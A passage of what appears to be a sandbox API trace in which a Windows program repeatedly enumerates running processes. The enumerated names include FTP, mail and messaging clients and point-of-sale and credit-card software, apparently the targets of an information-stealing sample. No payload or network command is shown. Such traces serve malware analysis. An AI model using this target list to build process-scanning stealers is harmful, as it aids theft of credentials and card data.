cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.411] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0213.413] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0213.422] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.424] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0213.426] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0213.429] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0213.431] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0213.433] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0213.437] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0213.438] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0213.440] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0213.442] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0213.444] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0213.445] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0213.447] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0213.451] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0213.453] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0213.454] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0213.456] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0213.457] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0213.461] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0213.463] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0213.464] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0213.466] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0213.467] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0213.469] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0213.470] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0213.472] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0213.473] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0213.475] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0213.477] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0213.482] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0213.484] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0213.487] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0213.489] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0213.491] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0213.493] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0213.495] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0213.563] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0213.566] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0213.569] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0213.571] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0213.577] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0213.580] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0213.582] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0213.584] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0213.587] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0213.593] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0213.595] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0213.597] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0213.599] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0213.601] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0213.604] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0213.672] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0213.675] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0213.677] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0213.680] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0213.682] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0213.688] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0213.690] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0213.692] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0213.694] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0213.697] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0213.703] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0213.705] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0213.708] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0213.710] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0213.712] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0213.736] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0213.738] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.740] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.742] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.744] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0213.751] CloseHandle (hObject=0x11cc) returned 1 [0213.751] Sleep (dwMilliseconds=0x64) [0213.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0213.917] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.922] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.925] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.927] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.929] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.931] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.936] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.938] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.940] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.942] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, 